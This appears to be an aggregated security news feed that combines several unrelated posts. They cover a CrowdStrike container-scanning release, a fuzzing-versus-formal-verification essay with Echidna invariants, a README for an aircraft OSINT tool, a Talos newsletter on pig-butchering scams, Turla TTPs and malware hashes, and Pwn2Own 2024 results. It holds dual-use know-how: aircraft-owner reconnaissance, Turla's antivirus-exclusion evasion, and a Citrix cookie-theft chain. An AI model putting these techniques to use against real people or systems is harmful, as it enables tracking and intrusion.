For large enterprises that want to maintain the agility of the cloud, it’s often difficult to ensure DevOps teams consistently scan images for vulnerabilities before deployment. Unscanned images could potentially leave critical applications exposed to a breach. This gap in security oversight requires a solution capable of assessing containers already deployed, particularly those with unscanned images or without access to the registry information. 

Recognizing this need, cloud security leader CrowdStrike has enhanced its CrowdStrike Falcon® Cloud Security capabilities to ensure organizations can protect their cloud workloads throughout the entire software development lifecycle and effectively combat adversaries targeting the cloud. Today we’re releasing two new features to help security and DevOps teams secure everything they build in the cloud.

Assess Images for Risks Before Deployment

We have released Falcon Cloud Security Image Assessment at Runtime (IAR) along with additional policy and registry customization tools. 

While pre-deployment image scanning is essential, organizations that only focus on this aspect of application development may create a security gap for containers that are deployed without prior scanning or lack registry information. These security gaps are not uncommon and could be exploited if left unaddressed.

IAR will address this issue by offering: 

  • Continuous security posture: By assessing images at runtime, organizations can maintain a continuous security posture throughout the software development lifecycle, identifying and mitigating threats in real time even after containers are deployed.
  • Runtime vulnerability and malware detection: IAR identifies vulnerabilities, malware and secrets, providing a holistic view of the security health of containers. This will help organizations take preventative actions on potential threats to their containers. 
  • Comprehensive coverage: If containers are launched with unscanned images, or if the registry information is unavailable, IAR provides the flexibility to fully secure containers by ensuring that none go unchecked. This enhancement widens the coverage for DevOps teams utilizing image registries, extending CrowdStrike’s robust pre-runtime security capabilities beyond the already supported 16 public registries — the most of any vendor in the market. 

Figure 1. Kubernetes and Containers Inventory Dashboard in the Falcon Cloud Security console (click to enlarge)

 

IAR is developed for organizations with specific data privacy constraints — for example, those with strict regulations around sharing customer data. Recognizing these challenges, IAR provides a local assessment that enables customers to conduct comprehensive image scans within their own environments. This addresses the critical need for privacy and efficiency by allowing organizations to bypass the limitations of cloud-based scanning solutions, which are unable to conduct scans at the local level.

Further, IAR helps boost operational efficiency at times when customers don’t want to modify or update their CI/CD pipelines to accommodate image assessment capabilities. Its runtime vulnerability scanning enhances container security and eliminates the need for direct integration with an organization’s CI/CD pipeline. This ensures organizations can perform immediate vulnerability assessments as containers start up, examining not only operating system flaws but also package and application-level vulnerabilities. This real-time scanning also enables the creation of an up-to-date software bill of materials (SBOM), a comprehensive inventory of all components along with their security posture. 

A Better Approach to Preventing Non-Compliant Containers and Images

Teams rely on the configuration of access controls within registries to effectively manage permissions for cloud resources. Without proper registry filtering, organizations cannot control who has access to specific data or services within their cloud infrastructure. 

Additionally, developer and security teams often lack the flexibility and visibility to understand where and how to find container images that fall out of security compliance when they have specific requirements like temporary exclusions. These problems can stem from using disparate tools and/or lacking customized rule-making and filtering within their cloud security tools. Security teams then must also be able to relay the relevant remediation steps to developer owners to quickly update the image. These security gaps, if left unchecked, can lead to increased risk and slow down DevSecOps productivity.

Figure 2. Image Assessment policy exclusions in the Falcon Cloud Security console (click to enlarge)

 

To that end, we are also announcing new image assessment policies and registry filters to improve the user experience, accelerate team efficiency and stop breaches. 

These enhancements will address issues by offering:

  • Greater control: Enhanced policy exclusion writing tools offer greater control over security policies, allowing organizations to more easily manage access, data and services within their cloud infrastructure while giving the owners of containers and assets the visibility to address areas most critical to them so they can focus on what matters.
  • Faster remediation for developers: Using enhanced image assessment policies, developers will be able to more quickly understand why a policy has failed a container image and be able to rapidly address issues before they can pose a greater security risk. 
  • Maintain Image Integrity: By creating new policies and rules, security administrators will be able to ensure only secure images are built or deployed.    
  • Scalability: As businesses grow and evolve, so do their security needs. CrowdStrike’s customizable cloud policies are designed to scale seamlessly, ensuring security measures remain effective and relevant regardless of organizational size or complexity.

These enhancements are designed to improve container image security, reduce the risks associated with non-compliance, and improve the collaboration and responsiveness of security and developer teams. These changes continue to build on the rapid innovations across Falcon Cloud Security to stop breaches in the cloud.  

Delivered from the AI-native CrowdStrike Falcon Platform

The release of IAR and new policy enhancements are more than just incremental updates — they represent a shift in container security. By integrating security measures throughout the entire lifecycle of a container, from its initial deployment to its active phase in cloud environments, CrowdStrike is not just responding to the needs of the modern DevSecOps landscape but anticipating them, offering a robust, efficient and seamless solution for today’s security challenges. 

Unlike other vendors that may offer disjointed security components, CrowdStrike’s approach integrates elements across the entire cloud infrastructure. From hybrid to multi-cloud environments, everything is managed through a single, intuitive console within the AI-native CrowdStrike Falcon® platform. This unified cloud-native application protection platform (CNAPP) ensures organizations achieve the highest standards of security, effectively shielding against breaches with an industry-leading cloud security solution. The IAR feature, while pivotal, is just one component of this comprehensive CNAPP approach, underscoring CrowdStrike’s commitment to delivering unparalleled security solutions that meet and anticipate the adversaries’ attacks on cloud environments.

Get a free Cloud Security Risk Review and see Falcon Cloud Security in action for yourself.  

During the review, you will engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment, and identify misconfigurations, vulnerabilities and potential cloud threats. 

Additional Resources

Why fuzzing over formal verification?

By Tarun Bansal, Gustavo Grieco, and Josselin Feist

We recently introduced our new offering, invariant development as a service. A recurring question that we are asked is, “Why fuzzing instead of formal verification?” And the answer is, “It’s complicated.”

We use fuzzing for most of our audits but have used formal verification methods in the past. In particular, we found symbolic execution useful in audits such as Sai, Computable, and Balancer. However, we realized through experience that fuzzing tools produce similar results but require significantly less skill and time.

In this blog post, we will examine why the two principal assertions in favor of formal verification often fall short: proving the absence of bugs is typically unattainable, and fuzzing can identify the same bugs that formal verification uncovers.

Proving the absence of bugs

One of the key selling points of formal verification over fuzzing is its ability to prove the absence of bugs. To do that, formal verification tools use mathematical representations to check whether a given invariant holds for all input values and states of the system.

While such a claim can be attainable on a simple codebase, it’s not always achievable in practice, especially with complex codebases, for the following reasons:

  • The code may need to be rewritten to be amenable to formal verification. This leads to the verification of a pseudo-copy of the target instead of the target itself. For example, the Runtime Verification team verified the pseudocode of the deposit contract for the ETH2.0 upgrade, as mentioned in this excerpt from their blog post:

    Specifically, we first rigorously formalized the incremental Merkle tree algorithm. Then, we extracted a pseudocode implementation of the algorithm employed in the deposit contract, and formally proved the correctness of the pseudocode implementation.

  • Complex code may require a custom summary of some functionality to be analyzed. In these situations, the verification relies on the custom summary to be correct, which shifts the responsibility of correctness to that summary. To build such a summary, users might need to use an additional custom language, such as CVL, which increases the complexity.
  • Loops and recursion may require adding manual constraints (e.g., unrolling the loop for only a given amount of time) to help the prover. For example, the Certora prover might unroll some loops for a fixed number of iterations and report any additional iteration as a violation, forcing further involvement from the user.
  • The solver can time out. If the tool relies on a solver for equations, finding a solution in a reasonable time may not be possible. In particular, proving code with a high number of nonlinear arithmetic operations or updates to storage or memory is challenging. If the solver times out, no guarantee can be provided.

So while proving the absence of bugs is a benefit of formal verification methods in theory, it may not be the case in practice.

Finding bugs

When formally verifying the code is not possible, formal verification tools can still be used as bug finding tools. However, the question remains, “Can formal verification find real bugs that cannot be found by a fuzzer?” At this point, wouldn’t it just be easier to use a fuzzer?

To answer this question, we looked at two bugs found using formal verification in MakerDAO and Compound and then attempted to find these same bugs with only a fuzzer. Spoiler alert: we succeeded.

We selected these two bugs because they were widely advertised as having been discovered through formal verification, and they affected two popular protocols. To our surprise, it was difficult to find public issues discovered solely through formal verification, in contrast with the many bugs found by fuzzing (see our security reviews).

Our fuzzer found both bugs in a matter of minutes, running on a typical development laptop. The bugs we evaluated, as well as the formal verification and fuzz testing harnesses we used to discover them, are available on our GitHub page about fuzzing formally verified contracts to reproduce popular security issues.

Fundamental invariant of DAI

MakerDAO found a bug in its live code after four years. You can read more about the bug in When Invariants Aren’t: DAI’s Certora Surprise. Using the Certora prover, MakerDAO found that the fundamental invariant of DAI, which is that the sum of all collateral-backed debt and unbacked debt should equal the sum of all DAI balances, could be violated in a specific case. The core issue is that calling the init function when a vault’s Rate state variable is zero and its Art state variable is nonzero changes the vault’s total debt, which violates the invariant checking sum of total debt and total DAI supply. The MakerDAO team concluded that calling the init function after calling the fold function is a path to break the invariant.

function sumOfDebt() public view returns (uint256) {
    uint256 length = ilkIds.length;
    uint256 sum = 0;
    for (uint256 i=0; i < length; ++i){
        sum = sum + ilks[ilkIds[i]].Art * ilks[ilkIds[i]].rate;
    }
    return sum;
}

function echidna_fund_eq() public view returns (bool) {
    return debt == vice + sumOfDebt();
}

Figure 1: Fundamental equation of DAI invariant in Solidity

We implemented the same invariant in Solidity, as shown in figure 1, and checked it with Echidna. To our surprise, Echidna violated the invariant and found a unique path to trigger the violation. Our implementation is available in the Testvat.sol file of the repository. Implementing the invariant was easy because the source code under test was small and required only logic to compute the sum of all debts. Echidna took less than a minute on an i5 12-GB RAM Linux machine to violate the invariant.

Liquidation of collateralized account in Compound V3 Comet

The Certora team used their Certora Prover to identify an interesting issue in the Compound V3 Comet smart contracts that allowed a fully collateralized account to be liquidated. The root cause of this issue was using an 8-bit mask for a 16-bit vector. The mask remains zero for the higher bits in the vector, which skips assets while calculating total collateral and results in the liquidation of the collateralized account. More on this issue can be found in the Formal Verification Report of Compound V3 (Comet).

function echidna_used_collateral() public view returns (bool) {
    for (uint8 i = 0; i < assets.length; ++i) {
        address asset = assets[i].asset;
        uint256 userColl = sumUserCollateral(asset, true);
        uint256 totalColl = comet.getTotalCollateral(asset);
        if (userColl != totalColl) {
            return false;
        }
    }
    return true;
}

function echidna_total_collateral_per_asset() public view returns (bool) {
    for (uint8 i = 0; i < assets.length; ++i) {
        address asset = assets[i].asset;
        uint256 userColl = sumUserCollateral(asset, false);
        uint256 totalColl = comet.getTotalCollateral(asset);
        if (userColl != totalColl) {
            return false;
        }
    }
    return true;
}

Figure 2: Compound V3 Comet invariant in Solidity

Echidna discovered the issue with the implementation of the invariant in Solidity, as shown in figure 2. This implementation is available in the TestComet.sol file in the repository. Implementing the invariant was easy; it required limiting the number of users interacting with the test contract and adding a method to calculate the sum of all user collateral. Echidna broke the invariant within minutes by generating random transaction sequences to deposit collateral and checking invariants.

Is formal verification doomed?

Formal verification tools require a lot of domain-specific knowledge to be used effectively and require significant engineering efforts to apply. Grigore Rosu, Runtime Verification’s CEO, summarized it as follows:

Figure 3: A tweet from the founder of Runtime Verification Inc.

While formal verification tools are constantly improving, which reduces the engineering effort, none of the existing tools reach the ease of use of existing fuzzers. For example, the Certora Prover makes formal verification more accessible than ever, but it is still far less user-friendly than a fuzzer for complex codebases. With the rapid development of these tools, we hope for a future where formal verification tools become as accessible as other dynamic analysis tools.

So does that mean we should never use formal verification? Absolutely not. In some cases, formally verifying a contract can provide additional confidence, but these situations are rare and context-specific.

Consider formal verification for your code only if the following are true:

  • You are following an invariant-driven development approach.
  • You have already tested many invariants with fuzzing.
  • You have a good understanding of which remaining invariants and components would benefit from formal methods.
  • You have solved all the other issues that would decrease your code maturity.

Writing good invariants is the key

Over the years, we have observed that the quality of invariants is paramount. Writing good invariants is 80% of the work; the tool used to check/verify them is important but secondary. Therefore, we recommend starting with the easiest and most effective technique—fuzzing—and relying on formal verification methods only when appropriate.

If you’re eager to refine your approach to invariants and integrate them into your development process, contact us to leverage our expertise.

Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information

gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



“Pig butchering” is an evolution of a social engineering tactic we’ve seen for years

“Pig butchering” is an evolution of a social engineering tactic we’ve seen for years

Whether you want to call them “catfishing,” “pig butchering” or just good ‘old-fashioned “social engineering,” romance scams have been around forever.  

I was first introduced to them through the MTV show “Catfish,” but recently they seem to be making headlines as the term “pig butchering” enters the public lexicon. John Oliver recently covered it on “Last Week Tonight,” which means everyone my age with an HBO account heard about it a few weeks ago. And one of my favorite podcasts going, “Search Engine,” just covered it in an episode

The concept of “pig butchering” scams generally follows the same chain of events: 

  • An unknown phone number texts or messages a target with a generally harmless message, usually asking for a random name disguised as an “Oops, wrong number!” text. 
  • When the target responds, the actor tries to strike up a conversation with a friendly demeanor. 
  • If the conversation persists, they usually evolve into “love bombing,” including compliments, friendly advice, ego-boosting, and saying flattering things about any photos the target has sent. 
  • Sometimes, the relationship may turn romantic. 
  • The scammer eventually “butchers” the “pig” that has been “fattened up” to that point, scamming them into handing over money, usually in the form of a phony cryptocurrency app, or just straight up asking for the target to send the scammer money somehow. 

There are a few twists and turns along the way based on the exact scammer, but that’s generally how it works. What I think is important to remember is that this specific method of separating users from their money is not actually new.  

The FBI seems to release a renewed warning about romance scams every Valentine’s Day when people are more likely to fall for a stranger online wanting to make a real connection and then eventually asking for money. I even found a podcast from the FBI in 2015 in which they warned that scammers “promise love, romance, to entice their victims online,” estimating that romance-related scams cost consumers $82 million in the last half of 2014.  

The main difference that I can tell between “pig butchering” and past romance scams is the sheer scale. Many actors running these operations are relying on human trafficking and sometimes literal imprisonment, forcing these people against their will to send these mass blocks of messages to a variety of targets indiscriminately. Oftentimes in these groups, scammers who are less “successful” in luring victims can be verbally and physically harassed and punished. That is, of course, a horrible human toll that these operations are taking, but they also extend far beyond the world of cybersecurity. 

In the case of pig butchering scams, it’s not really anything that can be solved by a cybersecurity solution or sold in a package. Instead, it relies on user education and the involvement of law enforcement agencies and international governments to ensure these farms can’t operate in the shows. The founders who run them are brought to justice. 

It’s never a bad thing that users become more educated on these scams, because of that, but I also feel it’s important to remember that romance-related scams, and really any social engineering built on a personal “relationship,” has been around for years, and “pig butchering” is not something new that just started popping up. 

These types of scams are ones that our culture has kind of just accepted as part of daily life at this point (who doesn’t get surprised when they get a call about their “car’s extended warranty?), and now the infrastructure to support these scams is taking a larger human toll than ever. 

The one big thing 

Talos has yet another round of research into the Turla APT, and now we’re able to see the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises. Before deploying TinyTurla-NG, Turla will attempt to configure anti-virus software exclusions to evade detection of their backdoor. Once exclsions have been set up, TTNG is written to the disk, and persistence is established by creating a malicious service. 

Why do I care? 

Turla, and this recently discovered TinyTurlaNG tool that Talos has been writing about, is an international threat that’s been around for years, so it’s always important for the entire security community to know what they’re up to. Most recently, Turla used these tactics to target Polish non-governmental organizations (NGOs) and steal sensitive data.  

So now what? 

During Talos’ research into TinyTurla-NG, we’ve released several new rounds of detection content for Cisco Secure products. Read our past two blog posts on this actor for more.  

Top security headlines of the week 

The Biden administration issued a renewed warning to public water systems and operators this week, saying state-sponsored actors could carry out cyber attacks soon, citing ongoing threats from Iran and China. The White House and U.S. Environmental Protection Agency sent a letter to every U.S. governor this week warning them that cyber attacks could disrupt access to clean drinking water and “impose significant costs on affected communities.” The letter also points to the U.S. Cyber and Infrastructure Security Agency’s list of known exploited vulnerabilities catalog, asking the managers of public water systems to ensure their systems are patched against these vulnerabilities. The EPA pointed to Volt Typhoon, a recently discovered Chinese APT that has reportedly been hiding on critical infrastructure networks for an extended period. A meeting among federal government leaders from the EPA and other related agencies is scheduled for March 21 to discuss threats to public water systems and how they can strengthen their cybersecurity posture. (Bloomberg, The Verge

UnitedHealth says it's still recovering from a cyber attack that’s halted crucial payments to health care providers across the U.S., but has started releasing some of those funds this week, and expects its payment processing software to be back online soon. The cyber attack, first disclosed in February, targeted Change Healthcare, a subsidiary of United, that handles payment processing and pharmaceutical orders for hospital chains and doctors offices. UnitedHealth’s CEO said in a statement this week that the company has paid $2 billion to affected providers who spent nearly a month unable to obtain those funds or needing to switch to a paper billing system. A recently published survey from the American Hospital Association found that 94 percent of hospitals that responded experienced financial disruptions from the Change Healthcare attack, and costs at one point were hitting $1 million in revenue per day. (ABC News, CNBC

Nevada’s state court system is currently weighing a case that could undo end-to-end encryption across the U.S. The state’s Attorney General is currently suing Meta, the creators of Facebook, Instagram and WhatsApp, asking the company to remove end-to-end encryption for minors on the platform, with the promise of being able to catch and charge users who abuse the platform to lure minors. However, privacy advocates are concerned that any rulings against Meta and its encryption policies could have larger ripple effects, and embolden others to challenge encryption in other states. Nevada is arguing that Meta’s Messenger a “preferred method” for individuals targeting Nevada children for illicit activities. Privacy experts are in favor of end-to-end encryption because it safeguards messages during transmission and makes it more difficult for other parties to intercept and read them — including law enforcement agencies. (Tech Policy Press, Bloomberg Law

Can’t get enough Talos? 

Upcoming events where you can find Talos 

 

Botconf (April 23 - 26) 

Nice, Côte d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.

CARO Workshop 2024 (May 1 - 3) 

Arlington, Virginia

Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9) 

San Francisco, California    

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll |
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256: 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5 
MD5: ff1b6bb151cf9f671c929a4cbdb64d86 
Typical Filename: endpoint.query 
Claimed Product: Endpoint-Collector 
Detection Name: W32.File.MalParent 

SHA 256: e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3 
MD5: c16df0bfc6fda86dbfa8948a566d32c1 
Typical Filename: CEPlus.docm 
Claimed Product: N/A  
Detection Name: Doc.Downloader.Pwshell::mash.sr.sbx.vioc 

CISSP is changing! Common body of knowledge changes for 2024 | Cyber Work Hacks

Cyber Work Hacks is back to keep you updated with the CISSP exam! Infosec boot camp instructor Steve Spearman joins me to tell us about the new changes to the CISSP’s common body of knowledge (CBK) and how the changes to the CBK should (or shouldn’t!) affect your study and preparation for the exam! Keep learning, and keep it here for another Cyber Work Hack.

– Learn more about the CISSP: https://www.infosecinstitute.com/training/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/
 
0:00 - CISSP exam common body of knowledge 
1:16  - Changes to CISSP's CBK
7:45 - Why did CISSP make CBK changes?
9:17 - How to study for the CISSP
11:37 - Most important CISSP exam items 
14:04 - Best advice for taking the CISSP exam
15:03 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Citrix ADC – Unexpected Treasure

Reading Time: 10 minutes  TL;DR Setting secure rules for the RelayState parameter is a MUST when configuring Citrix Application Delivery Controller (ADC) and Citrix Gateway as SAML Service Provider, because an attacker can exploit a chain of three low-risk vulnerabilities to compromise victims’ accounts. By luring users to a malicious domain, attackers can steal session cookies and gain unauthorized […]

Pwn2Own Vancouver 2024 - Day Two Results

Welcome to the second and final day of Pwn2Own Vancouver 2024! We saw some amazing research yesterday, including a Tesla exploit and a single exploit hitting both Chrome and Edge. So far, we have paid out $723,500 for the event, and we’re poised to hit $1,000,000 again. Today looks to be just as exciting with more attempts in virtualization, browser sandbox escapes, and the Pwn2Own’s first ever Docker escape, so stay tuned for all of the results!


And that’s a wrap! Pwn2Own Vancouver 2024 has come to a close. In total, we awarded $1,132,500 for 29 unique 0-days. We’re also happy to award Manfred Paul with the title of Master of Pwn. He won $202,500 and 25 points total. Combining the last three events (Toronto, Automotive, and Vancouver), we’ve awarded $3,494,750 for this year’s Pwn2Own events. Here’s how the Top 10 of this event added up:

Congratulations to all the winners. We couldn’t hold this event without the hard work of the contestants. And thanks to the vendors as well. They now have 90 days to fix these vulnerabilities. Special thanks to Tesla for their sponsorship and support. For details of each of today’s exploits, see the entries below.


SUCCESS - Marcin Wiązowski used an improper input validation bug to escalate privileges on Windows 11. He earns $15,000 and 3 Master of Pwn points.

SUCCESS - STAR Labs SG's exploit of VMware Workstation used two bugs. One is an uninitialized variable, but the other was previously known. They still win $30,000 and 6 Master of Pwn points.

SUCCESS - ColdEye used two bugs, including a UAF, to exploit Oracle VirtualBox. He even managed to leave the guest OS intact. His guest-to-host escape earns him $20,000 and 4 Master of Pwn points.

SUCCESS - Manfred Paul (@_manfp) used an OOB Write for the RCE and an exposed dangerous function bug to achieve his sandbox escape of Mozilla Firefox. He earns another $100,000 and 10 Master of Pwn points, which puts him in the lead with 25.

SUCCESS - First time Pwn2Own contestant Gabriel Kirkpatrick (gabe_k of exploits.forsale) used an always tricky race condition to escalate privileges on #Windows 11. He earns $15,000 and 3 Master of Pwn points.

SUCCESS - Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) from Palo Alto Networks used an OOB Read plus a novel technique for defeating V8 hardening to get arbitrary code execution in the renderer. They were able to exploit Chrome and Edge with the same bugs, earning $42,500 and 9 Master of Pwn points.

BUG COLLISION - STAR Labs SG successfully demonstrated their privilege escalation on Ubuntu desktop. However, they used a bug that was previously reported. They still earn $5,000 and 1 Master of Pwn point.

BUG COLLISION - Although the Hackinside Team was able to escalate privileges on Windows 11 through an integer underflow, the bug was known by the vendor. They still earn $7,500 and 1.5 Master of Pwn points.

SUCCESS -Seunghyun Lee (@0x10n) of KAIST Hacking Lab used a UAF to RCE in the renderer on both Microsoft Edge and Google Chrome. He earns $85,000 and 9 Master of Pwn points. That brings his contest total to $145,000 and 15 Master of Pwn points.

SUCCESS - The first Docker desktop escape at Pwn2Own involved two bugs, including a UAF. The team from STAR Labs SG did great work in the demonstration and earned $60,000 and 6 Master of Pwn points.

SUCCESS - Valentina Palmiotti (@chompie1337) with IBM X-Force used an Improper Update of Reference Count bug to escalate privileges on Windows 11. She nailed her first #Pwn2Own event and walks away with $15,000 and 3 Master of Pwn points.

BUG COLLISION - The final entry of Pwn2Own Vancouver 2024 ends as a collision as Theori used a bug that was previously know to escalate privileges on Ubuntu desktop. He still wins $5,000 and 1 Master of Pwn point.

❌